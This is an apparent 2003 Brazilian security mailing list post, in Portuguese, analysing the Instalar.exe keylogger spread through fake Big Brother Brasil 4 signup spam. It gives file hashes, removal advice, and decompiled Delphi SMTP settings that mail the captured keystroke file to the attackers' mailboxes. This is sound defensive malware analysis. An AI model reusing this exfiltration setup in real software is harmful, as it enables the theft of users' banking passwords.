[SECURITY-L] Artefato Instalar.exe BBB4
Daniela Regina Barbetti Silva
daniela em ccuec.unicamp.br
Qua Jun 18 09:29:18 -03 2003
Pessoal,
Vem crescendo o numero de programas "keylogger" que estao circulando
pela rede. Depois de instalado na maquina do usuario tudo o que e'
digitado e' capturado. A intencao e' obter senhas de bancos e/ou outros
sistemas que envolvam senhas.
Vale alertar, novamente, os usuarios sobre arquivos attachados.
Daniela
----- Forwarded message from Jarbas de Freitas Peixoto <jarbas em acmesecurity.org> -----
From: "Jarbas de Freitas Peixoto" <jarbas em acmesecurity.org>
Subject: [GTS-L] Artefato Instalar.exe BBB4
To: gts-l em listas.unesp.br
Date: Tue, 17 Jun 2003 20:54:48 -0300
X-mailer: Pegasus Mail for Windows (v4.11)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Senhores,
Ultimamente, o Laboratório ACME! tem recebido muitas perguntas a respeito
de um "artefato malicioso" chamado Instalar.exe, que usualmente chega até
você por email "SPAM" uma página chamada "Big Brother Brasil 4 FAÇAM
SUAS INSCRIÇÕES!!!". Assunto já discutido nessa calorosa lista.
- -------
Análise publicada em https://forum.acmesecurity.org/viewtopic.php?t=360
- -------
O programa Instalar.exe visa capturar informações de senhas de usuários de
bancos e outros sistemas que envolvam senhas.
Algumas evidências encontradas:
O programa Instalar.exe (md5sum - 6f12e67d792b30bfb9ca74e055be105e) é
na verdade um instalador (self-extractor) do artefato própriamente dito
Msdosdll.exe (made in Delphi). O conteúdo do instalador é:
b8d289aabcbcb16d9393fedf28c0fb65 *file.bck
dc302596bc79a15836cc54f79d932b4f *Ios.EXE
5baebb99bcefbb1c8292da6bb7843b37 *KeyChar.dll
5cea960368d9b223571851d064138071 *kt_dll.dll
81051bcc2cf1bedf378224b0a93e2877 *list.txt
3fa05f86bfa4e28bcd67ea55d8e6a12b *Msdosdll.exe
285b1db9b0b8afb1aaee84205843d42d *MsdosDll.INI
81051bcc2cf1bedf378224b0a93e2877 *winsee32.ver
A função do artefato Msdosdll.exe é muito parecida com a do Msnbc32.exe
(outro artefato Certificado_digital.exe em
https://forum.acmesecurity.org/viewtopic.php?t=348 )
Dentro do programa Msdosdll.exe foi encontrada várias strings com nomes de
bancos e funções para capturar os pressionamentos de teclas do usuário.
Fazendo análise do arquivo Ios.exe observa-se para onde estão sendo
enviados os pressionamentos.
"Descompilando" o arquivo Ios.exe observamos:
.... cortes para fim de brevidade ....
end
object Sm: TNMSMTP
Host = 'smtp.terra.com.br'
Port = 25
TimeOut = 800000
ReportLevel = 0
UserID = 'Jose manoel'
PostMessage.FromAddress = 'caixa.linck10 em terra.com.br'
PostMessage.FromName = 'spider'
PostMessage.ToAddress.Strings = (
'caixa.linck10 em terra.com.br')
PostMessage.ToBlindCarbonCopy.Strings = (
'')
PostMessage.Attachments.Strings = (
'c:\windows\system\file.bck')
PostMessage.Subject = 'Big_Virtual'
PostMessage.LocalProgram = 'c:\windows\system'
EncodeType = uuMime
ClearParams = True
SubType = mtPlain
Charset = 'us-ascii'
Left = 80
Top = 64
end
object bc: TBackupFile
Version = '5.10'
BackupMode = bmAll
CompressionLevel = clFastest
RestoreMode = rmAll
MaxSize = 0
SetArchiveFlag = False
RestoreFullPath = False
SaveFileID = False
Left = 80
Top = 32
end
object sm1: TNMSMTP
Host = 'smtp.uol.com.br'
Port = 25
TimeOut = 800000
ReportLevel = 0
UserID = 'Jose manoel'
PostMessage.FromAddress = 'w9z em uol.com.br'
PostMessage.FromName = 'spider'
PostMessage.ToAddress.Strings = (
'w9zw9z em uol.com.br')
PostMessage.ToBlindCarbonCopy.Strings = (
'')
PostMessage.Attachments.Strings = (
'c:\windows\system\file.bck')
PostMessage.Subject = 'Our_2_Virtual'
PostMessage.LocalProgram = 'c:\windows\system'
EncodeType = uuMime
ClearParams = True
SubType = mtPlain
Charset = 'us-ascii'
Left = 20
Top = 6
end
end
Há também variação do instalador (instalar.exe) md5sum -
196f712158d23211309a300133073614 *Instalar.exe
Conteúdo da variação:
b8d289aabcbcb16d9393fedf28c0fb65 *file.bck
8206c564be094697ceeb2b664b2cd097 *Ios.EXE << mudança
5baebb99bcefbb1c8292da6bb7843b37 *KeyChar.dll
5cea960368d9b223571851d064138071 *kt_dll.dll
81051bcc2cf1bedf378224b0a93e2877 *list.txt
3fa05f86bfa4e28bcd67ea55d8e6a12b *Msdosdll.exe
285b1db9b0b8afb1aaee84205843d42d *MsdosDll.INI
81051bcc2cf1bedf378224b0a93e2877 *winsee32.ver
Observando essa variação constatou-se que a mudança é apenas no arquivo
Ios.exe - arquivo que contém os emails para onde deverão ser enviados os
pressionamentos de teclas.
Descompilando e análisando Ios.exe da variação constatamos a mudança do
email do destinatário:
.... cortes para fim de brevidade ....
object Sm: TNMSMTP
Host = 'smtp.terra.com.br'
Port = 25
TimeOut = 800000
ReportLevel = 0
UserID = 'Jose manoel'
PostMessage.FromAddress = 'progtelecom.1 em terra.com.br'
PostMessage.FromName = 'spider'
PostMessage.ToAddress.Strings = (
'progtelecom.1 em terra.com.br')
PostMessage.ToBlindCarbonCopy.Strings = (
'')
PostMessage.Attachments.Strings = (
'c:\windows\system\file.bck')
PostMessage.Subject = 'Big_Virtual'
PostMessage.LocalProgram = 'c:\windows\system'
EncodeType = uuMime
ClearParams = True
SubType = mtPlain
Charset = 'us-ascii'
Left = 80
Top = 64
end
object bc: TBackupFile
Version = '5.10'
BackupMode = bmAll
CompressionLevel = clFastest
RestoreMode = rmAll
MaxSize = 0
SetArchiveFlag = False
RestoreFullPath = False
SaveFileID = False
Left = 80
Top = 32
end
object sm1: TNMSMTP
Host = 'smtp.uol.com.br'
Port = 25
TimeOut = 800000
ReportLevel = 0
UserID = 'Jose manoel'
PostMessage.FromAddress = 'w9z em uol.com.br'
PostMessage.FromName = 'spider'
PostMessage.ToAddress.Strings = (
'ispont em uol.com.br')
PostMessage.ToBlindCarbonCopy.Strings = (
'')
PostMessage.Attachments.Strings = (
'c:\windows\system\file.bck')
PostMessage.Subject = 'Our_2_Virtual'
PostMessage.LocalProgram = 'c:\windows\system'
EncodeType = uuMime
ClearParams = True
SubType = mtPlain
Charset = 'us-ascii'
Left = 20
Top = 6
end
end
- -----------
Perguntas freqüentes:
- - Como minha máquina é infectada?
Na verdade, não se trata de um vírus ou worn que "infecta". Trata-se de um
"keylogger" (capturador de pressionamentos) e ao clicar em instalar.exe você
estará instalando, ou seja, copiando os arquivos Msdosdll.exe, keychar.dll,
Msdosdll.exe, Msdosdll.INI, winsee32.ver e file.bck para o seu sistema
fazendo as entradas no registro para que ele execute automaticamente.
- - Como saber se o keylogger está na minha máquina?
Faça uma busca por Msdosdll.exe, keychar.dll, Msdosdll.exe, Msdosdll.INI,
winsee32.ver e file.bck ... ou olhe em C:\...\... e procure esses arquivos. :-/ {PRIVATE "TYPE=PICT;ALT=icon_rolleyes.gif"}
- - Como resolver?
Remover esses arquivos (inclusive suas entradas no registro) ou mais
"garantido" reinstalar o equipamento comprometido.
- ---------
Até mais,
Jarbs
=============================
Jarbas de Freitas Peixoto
jarbas em acmesecurity.org
ACME! Computer Security Research
UNESP - São José do Rio Preto - SP
=============================
-----BEGIN PGP SIGNATURE-----
Version: idw's PGP-Frontend 4.9.4 / 5-2003 + PGP 8.0.0
iQA/AwUBPu+qS3xi97baZwFkEQIFbwCggnvnzGw0vkI7IvEKPthQAFPGPZEAn396
ujKB3xs3vKodqdTCvtkhXnBr
=dTD8
-----END PGP SIGNATURE-----
----- End forwarded message -----
Mais detalhes sobre a lista de discussão SECURITY-L